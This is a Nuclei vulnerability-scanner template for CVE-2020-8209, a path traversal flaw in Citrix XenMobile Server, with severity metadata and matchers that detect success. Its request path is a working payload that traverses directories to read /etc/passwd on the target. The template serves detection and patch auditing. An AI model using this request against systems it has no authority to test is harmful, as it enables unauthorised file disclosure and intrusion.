nuclei-templates/cves/2020/CVE-2020-8209.yaml

37 lines
1.0 KiB
YAML

id: CVE-2020-8209
info:
name: Citrix XenMobile Server Path Traversal
author: dwisiswant0
severity: high
description: |
Improper access control in Citrix XenMobile Server 10.12 before RP2,
Citrix XenMobile Server 10.11 before RP4, Citrix XenMobile Server 10.10
before RP6 and Citrix XenMobile Server before 10.9 RP5 and leads to the ability to read arbitrary files.
reference:
- https://swarm.ptsecurity.com/path-traversal-on-citrix-xenmobile-server/
tags: cve,cve2020,citrix,lfi
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.50
cve-id: CVE-2020-8209
cwe-id: CWE-22
requests:
- method: GET
path:
- "{{BaseURL}}/jsp/help-sb-download.jsp?sbFileName=../../../etc/passwd"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0:"
part: body
- type: word
words:
- "fileDownload=true"
- "application/octet-stream"
- "attachment;"
condition: and
part: header